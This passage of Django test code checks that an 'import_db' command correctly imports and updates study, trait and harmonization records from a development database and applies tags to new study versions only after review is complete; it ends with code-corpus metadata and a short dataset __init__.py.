self.assertEqual(new_value, harmonized_trait_set_version.i_harmonized_by)
self.assertTrue(harmonized_trait_set_version.modified > t1)
self.assertEqual(new_value, harmonization_unit.i_tag)
self.assertTrue(harmonization_unit.modified > t1)
self.assertEqual(new_value, harmonized_trait.i_description)
self.assertTrue(harmonized_trait.modified > t1)
self.assertEqual(new_value, hev.i_value)
self.assertTrue(hev.modified > t1)
self.assertTrue(htrait_to_link_source in component_source_trait.source_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_link_source in component_source_trait.source_component_of_harmonization_unit.all())
self.assertTrue(htrait_to_link_batch in component_batch_trait.batch_component_of_harmonized_trait.all())
self.assertTrue(hunit_to_link_batch in component_batch_trait.batch_component_of_harmonization_unit.all())
self.assertTrue(hunit_to_link_age in component_age_trait.age_component_of_harmonization_unit.all())
self.assertTrue(htrait_to_link_harmonized in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all()) # noqa: E501
self.assertTrue(hunit_to_link_harmonized in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all()) # noqa: E501
self.assertTrue(reason_to_link in hts_version_to_link_reason.update_reasons.all())
self.assertTrue(hts_version_to_link_reason in reason_to_link.harmonizedtraitsetversion_set.all())
def test_values_match_after_all_updates(self):
"""All imported field values match those in the source db after making updates to the source db."""
# Initial import of the test data (with visit).
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Prepare for making changes in the devel database.
# Close the db connections because change_data_in_table() opens new connections.
self.cursor.close()
self.source_db.close()
# Copy/paste the upper part from test_updated_data_from_every_table and copy/paste the lower part from
# test_imported_ids_match_source_ids
# Make updates of every kind in the devel db.
new_value = 'asdfghjkl' # Use this value to reset things in multiple models.
# Update the global study table.
global_study = models.GlobalStudy.objects.all()[0]
sleep(1)
change_data_in_table(
'global_study', 'name', new_value, global_study._meta.pk.name.replace('i_', ''), global_study.pk)
# Update the study table.
study = models.Study.objects.all()[0]
change_data_in_table('study', 'study_name', new_value, study._meta.pk.name.replace('i_', ''), study.pk)
# Update the source study version table.
source_study_version = models.SourceStudyVersion.objects.all()[0]
new_is_deprecated = int(not source_study_version.i_is_deprecated)
change_data_in_table(
'source_study_version', 'is_deprecated', new_is_deprecated,
source_study_version._meta.pk.name.replace('i_', ''), source_study_version.pk)
# Update source dataset table.
source_dataset = models.SourceDataset.objects.all()[0]
new_description = '23oriuam.sadflkj'
change_data_in_table(
'source_dataset', 'dbgap_description', new_description, source_dataset._meta.pk.name.replace('i_', ''),
source_dataset.pk)
# Update the subcohort table.
subcohort = models.Subcohort.objects.get(pk=1)
change_data_in_table('subcohort', 'name', new_value, subcohort._meta.pk.name.replace('i_', ''), subcohort.pk)
# Update source trait table.
source_trait = models.SourceTrait.objects.all()[0]
change_data_in_table('source_trait', 'dbgap_comment', new_value, 'source_trait_id', source_trait.pk)
# Update source trait encoded values table.
sev = models.SourceTraitEncodedValue.objects.all()[0]
change_data_in_table(
'source_trait_encoded_values', 'value', new_value, sev._meta.pk.name.replace('i_', ''), sev.pk)
# Update harmonized trait set table.
harmonized_trait_set = models.HarmonizedTraitSet.objects.all()[0]
change_data_in_table(
'harmonized_trait_set', 'trait_set_name', new_value, harmonized_trait_set._meta.pk.name.replace('i_', ''),
harmonized_trait_set.pk)
# Update harmonized trait set version table.
harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.all()[0]
change_data_in_table(
'harmonized_trait_set_version', 'harmonized_by',
new_value, harmonized_trait_set_version._meta.pk.name.replace('i_', ''), harmonized_trait_set_version.pk
)
# Don't update allowed update reason table, because it should NOT change.
# Update harmonization unit table.
harmonization_unit = models.HarmonizationUnit.objects.all()[0]
change_data_in_table(
'harmonization_unit', 'tag', new_value, harmonization_unit._meta.pk.name.replace('i_', ''),
harmonization_unit.pk
)
# Update harmonized trait table.
harmonized_trait = models.HarmonizedTrait.objects.all()[0]
change_data_in_table('harmonized_trait', 'description', new_value, 'harmonized_trait_id', harmonized_trait.pk)
# Update harmonized trait encoded values table.
hev = models.HarmonizedTraitEncodedValue.objects.all()[0]
change_data_in_table(
'harmonized_trait_encoded_values', 'value', new_value, hev._meta.pk.name.replace('i_', ''), hev.pk)
# Prep for doing updates for m2m tables.
self.source_db = get_devel_db(permissions='full')
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Add a component source trait.
component_source_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_source = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[component_source_trait]))[0]
htrait_to_link_source = hunit_to_link_source.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link_source.i_trait_id, hunit_to_link_source.i_id, component_source_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
# Add a component batch trait.
component_batch_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_batch = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[component_batch_trait]))[0]
htrait_to_link_batch = hunit_to_link_batch.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
htrait_to_link_batch.i_trait_id, hunit_to_link_batch.i_id, component_batch_trait.i_trait_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
# Add a component age trait.
component_age_trait = models.SourceTrait.objects.order_by('?').first()
hunit_to_link_age = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[component_age_trait]))[0]
add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
date_added) values ('{}', '{}', '{}')""".format(
hunit_to_link_age.i_id, component_age_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_component_trait_query)
self.source_db.commit()
self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
# Add a component harmonized trait set version.
component_harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.order_by('?').first()
hunit_to_link_harmonized = models.HarmonizationUnit.objects.exclude(
i_id__in=models.HarmonizationUnit.objects.filter(
component_harmonized_trait_set_versions__in=[component_harmonized_trait_set_version]))[0]
htrait_to_link_harmonized = hunit_to_link_harmonized.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
harmonization_unit_id, component_trait_set_version_id, date_added) values
('{}', '{}', '{}', '{}')""".format(
htrait_to_link_harmonized.i_trait_id, hunit_to_link_harmonized.i_id,
component_harmonized_trait_set_version.i_id,
timezone.now().strftime('%Y-%m-%d %H:%M:%S')
)
self.cursor.execute(add_component_trait_query)
# Add an update reason to a harmonized trait set version.
reason_to_link = models.AllowedUpdateReason.objects.get(pk=1)
linked_hts_versions = reason_to_link.harmonizedtraitsetversion_set.all()
possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
hts_version_to_link_reason = list(unlinked_hts_versions)[0]
add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
harmonized_trait_set_version_id, date_added)
VALUES ({}, {}, '{}');""".format(
reason_to_link.pk, hts_version_to_link_reason.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
self.cursor.execute(add_reason_link_query)
self.source_db.commit()
# Close the full privileges db connection, and reopen as read-only.
self.cursor.close()
self.source_db.close()
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Get the updates.
management.call_command('import_db', '--devel_db', '--no_backup', '--verbosity=0',
'--taggedtrait_creator={}'.format(self.user.email))
# Check all of the regular models.
make_args_functions = (
CMD._make_global_study_args,
CMD._make_study_args,
CMD._make_source_study_version_args,
CMD._make_subcohort_args,
CMD._make_source_dataset_args,
CMD._make_harmonized_trait_set_args,
CMD._make_allowed_update_reason_args,
CMD._make_harmonized_trait_set_version_args,
CMD._make_harmonization_unit_args,
CMD._make_source_trait_args,
CMD._make_harmonized_trait_args,
CMD._make_source_trait_encoded_value_args,
CMD._make_harmonized_trait_encoded_value_args,
)
tables = (
'global_study',
'study',
'source_study_version',
'subcohort',
'source_dataset',
'harmonized_trait_set',
'allowed_update_reason',
'harmonized_trait_set_version',
'harmonization_unit',
'source_trait',
'harmonized_trait',
'source_trait_encoded_values',
'harmonized_trait_encoded_values',
)
model_names = (
models.GlobalStudy,
models.Study,
models.SourceStudyVersion,
models.Subcohort,
models.SourceDataset,
models.HarmonizedTraitSet,
models.AllowedUpdateReason,
models.HarmonizedTraitSetVersion,
models.HarmonizationUnit,
models.SourceTrait,
models.HarmonizedTrait,
models.SourceTraitEncodedValue,
models.HarmonizedTraitEncodedValue,
)
self.check_imported_values_match(make_args_functions, tables, model_names)
# Check all of the M2M relationships.
m2m_tables = (
'component_source_trait',
'component_harmonized_trait_set',
'component_batch_trait',
'component_age_trait',
'component_source_trait',
'component_harmonized_trait_set',
'component_batch_trait',
'harmonized_trait_set_version_update_reason',
)
group_by_fields = (
'harmonized_trait_id',
'harmonized_trait_id',
'harmonized_trait_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonization_unit_id',
'harmonized_trait_set_version_id',
)
concat_fields = (
'component_trait_id',
'component_trait_set_version_id',
'component_trait_id',
'component_trait_id',
'component_trait_id',
'component_trait_set_version_id',
'component_trait_id',
'reason_id',
)
parent_models = (
models.HarmonizedTrait,
models.HarmonizedTrait,
models.HarmonizedTrait,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizationUnit,
models.HarmonizedTraitSetVersion,
)
m2m_att_names = (
'component_source_traits',
'component_harmonized_trait_set_versions',
'component_batch_traits',
'component_age_traits',
'component_source_traits',
'component_harmonized_trait_set_versions',
'component_batch_traits',
'update_reasons',
)
self.check_imported_m2m_relations_match(
m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
# Load a new study and run all of these checks again.
self.cursor.close()
self.source_db.close()
load_test_source_db_data('new_study.sql')
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
# Check all of the regular models again.
self.check_imported_values_match(make_args_functions, tables, model_names)
# Check all of the M2M relationships again.
self.check_imported_m2m_relations_match(
m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
def test_updated_sourcetraits_are_tagged(self):
"""Taggedtraits from v1 of a study are applied to v2 during import."""
# Run import of base test data.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.cursor.close()
self.source_db.close()
# Choose some source traits to remove from one version to test different situations.
study_phs = 956
ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
# I used this code to figure out which traits could be found in v1 and v2.
# Leave it here commented out in case this needs to be done again later.
# # Compare lists of phvs between the two study versions to figure out what to tag.
# v1_phvs = models.SourceTrait.objects.filter(
# source_dataset__source_study_version=ssv1
# ).values_list('i_dbgap_variable_accession', flat=True)
# v2_phvs = models.SourceTrait.objects.filter(
# source_dataset__source_study_version=ssv2
# ).values_list('i_dbgap_variable_accession', flat=True)
# v1_phvs = set(v1_phvs)
# v2_phvs = set(v2_phvs)
# in_both = v1_phvs & v2_phvs
# only_v1 = v1_phvs - v2_phvs
# only_v2 = v2_phvs - v1_phvs
# print(in_both)
# print(only_v1)
# print(only_v2)
# There are 51 variables in v1 of Amish, so don't go above 50 for the index.
amish_v1_traits = models.SourceTrait.objects.filter(
source_dataset__source_study_version__study__pk=study_phs,
source_dataset__source_study_version__i_version=1
).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
old_trait_v2_only = amish_v1_traits.all()[1]
old_trait_v1_only = amish_v1_traits.all()[2]
old_trait_both = amish_v1_traits.all()[3]
old_trait_to_not_tag = amish_v1_traits.all()[4]
# Remove a trait from v1.
old_trait_v2_only.delete()
# Create the tagged traits in v1.
# Both of these are status confirmed in dccreview step.
old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Create taggedtraits with all valid status combinations to make sure that it doesn't prevent application
# of updated tags (tests the check for incomplete review status).
followup_agree_taggedtrait = TaggedTraitFactory.create(
trait=amish_v1_traits.all()[5], archived=True)
DCCReview.objects.create(
tagged_trait=followup_agree_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_agree_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_AGREE
)
followup_disagree_confirm_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6])
DCCReview.objects.create(
tagged_trait=followup_disagree_confirm_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_disagree_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_DISAGREE
)
DCCDecision.objects.create(
dcc_review=followup_disagree_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_CONFIRM
)
followup_disagree_remove_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6], archived=True)
DCCReview.objects.create(
tagged_trait=followup_disagree_remove_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_disagree_remove_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_DISAGREE
)
DCCDecision.objects.create(
dcc_review=followup_disagree_remove_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_REMOVE
)
followup_noresponse_confirm_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6])
DCCReview.objects.create(
tagged_trait=followup_noresponse_confirm_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
DCCDecision.objects.create(
dcc_review=followup_noresponse_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_CONFIRM
)
followup_noresponse_remove_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6], archived=True)
DCCReview.objects.create(
tagged_trait=followup_noresponse_remove_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
DCCDecision.objects.create(
dcc_review=followup_noresponse_remove_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_REMOVE
)
# Load test data with updated study version.
load_test_source_db_data('new_study_version.sql')
# Remove a trait from the devel db via SQL query.
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
new_trait_v1_only_conditions = (
'study_accession={}'.format(study_phs),
'study_version=2',
'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
)
new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
new_trait_v1_only_conditions
)
cursor.execute(new_trait_v1_only_query)
new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
cursor.execute(delete_query)
source_db.commit()
cursor.close()
source_db.close()
# Run import of updated study version
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
# Tags match for the taggedtrait in both v1 and v2.
new_trait_both = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_both.i_dbgap_variable_accession
)
self.assertQuerysetEqual(new_trait_both.non_archived_tags.all().values_list('lower_title', flat=True),
old_trait_both.non_archived_tags.all().values_list('lower_title', flat=True),
transform=lambda x: x)
# There isn't a v2 trait for the v1 only trait.
with self.assertRaises(ObjectDoesNotExist):
new_trait_v1_only = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v1_only.i_dbgap_variable_accession
)
# There aren't any tags in v2 for the trait that didn't exist in v1.
new_trait_v2_only = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v2_only.i_dbgap_variable_accession
)
self.assertEqual(new_trait_v2_only.all_taggedtraits.all().count(), 0)
# There isn't a tagged trait for the v1 trait that was not tagged.
new_trait_not_tagged = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v2_only.i_dbgap_variable_accession
)
self.assertEqual(new_trait_not_tagged.all_taggedtraits.all().count(), 0)
# The count of tagged traits in v2 is 1. The count of tagged traits in v1 is 2.
ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
self.assertEqual(ssv1_taggedtraits.count(), 7)
ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
self.assertEqual(ssv2_taggedtraits.count(), 3)
# There are three status combinations that should prevent the application of tags during import:
# 1. dcc_review, dcc_review__study_response, and dcc_review__dcc_decision do not exist
# 2. dcc_review followup, study_response disagree, and dcc_decision does not exist
# 3. dcc_review followup, and study_response and dcc_decision do not exist
# The next three test methods will test that each of these three cases stop
# the tag application process during import.
def test_tags_not_applied_if_unreviewed_taggedtraits_exist(self):
"""Tags are not applied to updated traits if any taggedtraits with incomplete review process exist."""
# Run import of base test data.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.cursor.close()
self.source_db.close()
# Choose some source traits to remove from one version to test different situations.
study_phs = 956
ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
amish_v1_traits = models.SourceTrait.objects.filter(
source_dataset__source_study_version__study__pk=study_phs,
source_dataset__source_study_version__i_version=1
).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
old_trait_v2_only = amish_v1_traits.first()
old_trait_v1_only = amish_v1_traits.last()
old_trait_both = amish_v1_traits.all()[2]
old_trait_to_not_tag = amish_v1_traits.all()[3]
old_trait_to_leave_unreviewed = amish_v1_traits.all()[4]
# Remove a trait from v1.
old_trait_v2_only.delete()
# Create the tagged traits in v1.
old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Create one unreviewed taggedtrait.
old_unreviewed_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_unreviewed)
old_taggedtraits_count = TaggedTrait.objects.count()
# Load test data with updated study version.
load_test_source_db_data('new_study_version.sql')
# Remove a trait from the devel db via SQL query.
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
new_trait_v1_only_conditions = (
'study_accession={}'.format(study_phs),
'study_version=2',
'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
)
new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
new_trait_v1_only_conditions
)
cursor.execute(new_trait_v1_only_query)
new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
cursor.execute(delete_query)
source_db.commit()
cursor.close()
source_db.close()
# Run import of updated study version
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
# There are no new taggedtraits.
later_taggedtraits_count = TaggedTrait.objects.count()
self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
self.assertEqual(ssv1_taggedtraits.count(), 3)
ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
self.assertEqual(ssv2_taggedtraits.count(), 0)
def test_tags_not_applied_if_disagreeundecided_taggedtraits_exist(self):
"""Tags are not applied to updated traits if dccdecision is missing after disagree studyresponse."""
# Run import of base test data.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.cursor.close()
self.source_db.close()
# Choose some source traits to remove from one version to test different situations.
study_phs = 956
ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
amish_v1_traits = models.SourceTrait.objects.filter(
source_dataset__source_study_version__study__pk=study_phs,
source_dataset__source_study_version__i_version=1
).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
old_trait_v2_only = amish_v1_traits.first()
old_trait_v1_only = amish_v1_traits.last()
old_trait_both = amish_v1_traits.all()[2]
old_trait_to_not_tag = amish_v1_traits.all()[3]
old_trait_to_leave_undecided = amish_v1_traits.all()[4]
# Remove a trait from v1.
old_trait_v2_only.delete()
# Create the tagged traits in v1.
old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Create one undecided taggedtrait.
old_undecided_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_undecided)
DCCReview.objects.create(
tagged_trait=old_undecided_taggedtrait, creator=self.user, status=DCCReview.STATUS_FOLLOWUP)
StudyResponse.objects.create(
dcc_review=old_undecided_taggedtrait.dcc_review, creator=self.user, status=StudyResponse.STATUS_DISAGREE)
old_taggedtraits_count = TaggedTrait.objects.count()
# Load test data with updated study version.
load_test_source_db_data('new_study_version.sql')
# Remove a trait from the devel db via SQL query.
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
new_trait_v1_only_conditions = (
'study_accession={}'.format(study_phs),
'study_version=2',
'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
)
new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
new_trait_v1_only_conditions
)
cursor.execute(new_trait_v1_only_query)
new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
cursor.execute(delete_query)
source_db.commit()
cursor.close()
source_db.close()
# Run import of updated study version
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
# There are no new taggedtraits.
later_taggedtraits_count = TaggedTrait.objects.count()
self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
self.assertEqual(ssv1_taggedtraits.count(), 3)
ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
self.assertEqual(ssv2_taggedtraits.count(), 0)
def test_tags_not_applied_if_noresponseundecided_taggedtraits_exist(self):
"""Tags are not applied to updated traits if dccdecision and studyresponse are both missing."""
# Run import of base test data.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.cursor.close()
self.source_db.close()
# Choose some source traits to remove from one version to test different situations.
study_phs = 956
ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
amish_v1_traits = models.SourceTrait.objects.filter(
source_dataset__source_study_version__study__pk=study_phs,
source_dataset__source_study_version__i_version=1
).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
old_trait_v2_only = amish_v1_traits.first()
old_trait_v1_only = amish_v1_traits.last()
old_trait_both = amish_v1_traits.all()[2]
old_trait_to_not_tag = amish_v1_traits.all()[3]
old_trait_to_leave_undecided = amish_v1_traits.all()[4]
# Remove a trait from v1.
old_trait_v2_only.delete()
# Create the tagged traits in v1.
old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Create one undecided taggedtrait.
old_undecided_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_undecided)
DCCReview.objects.create(
tagged_trait=old_undecided_taggedtrait, creator=self.user, status=DCCReview.STATUS_FOLLOWUP)
old_taggedtraits_count = TaggedTrait.objects.count()
# Load test data with updated study version.
load_test_source_db_data('new_study_version.sql')
# Remove a trait from the devel db via SQL query.
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
new_trait_v1_only_conditions = (
'study_accession={}'.format(study_phs),
'study_version=2',
'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
)
new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
new_trait_v1_only_conditions
)
cursor.execute(new_trait_v1_only_query)
new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
cursor.execute(delete_query)
source_db.commit()
cursor.close()
source_db.close()
# Run import of updated study version
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
# There are no new taggedtraits.
later_taggedtraits_count = TaggedTrait.objects.count()
self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
self.assertEqual(ssv1_taggedtraits.count(), 3)
ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
self.assertEqual(ssv2_taggedtraits.count(), 0)
| 55.2837
| 154
| 0.677919
| 28,104
| 223,512
| 5.076502
| 0.028644
| 0.025177
| 0.022457
| 0.021574
| 0.85758
| 0.826369
| 0.798689
| 0.781713
| 0.769468
| 0.757615
| 0
| 0.008617
| 0.22376
| 223,512
| 4,042
| 155
| 55.297378
| 0.813693
| 0.168362
| 0
| 0.732847
| 0
| 0.000331
| 0.122504
| 0.041252
| 0.001326
| 0
| 0
| 0.000247
| 0.09115
| 1
| 0.053696
| false
| 0.000663
| 0.053033
| 0
| 0.115015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71107c9dd33dfd5408c87690cd80285a19ddd011
| 101
|
py
|
Python
|
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | 5
|
2021-09-15T21:48:55.000Z
|
2022-03-22T11:21:58.000Z
|
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | 1
|
2021-08-20T08:40:15.000Z
|
2021-08-20T08:40:15.000Z
|
from .imagename_dataset import *
from .online_labeler_dataset import *
from .pseudo_dataset import *
| 25.25
| 37
| 0.821782
| 13
| 101
| 6.076923
| 0.538462
| 0.493671
| 0.43038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118812
| 101
| 3
| 38
| 33.666667
| 0.88764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
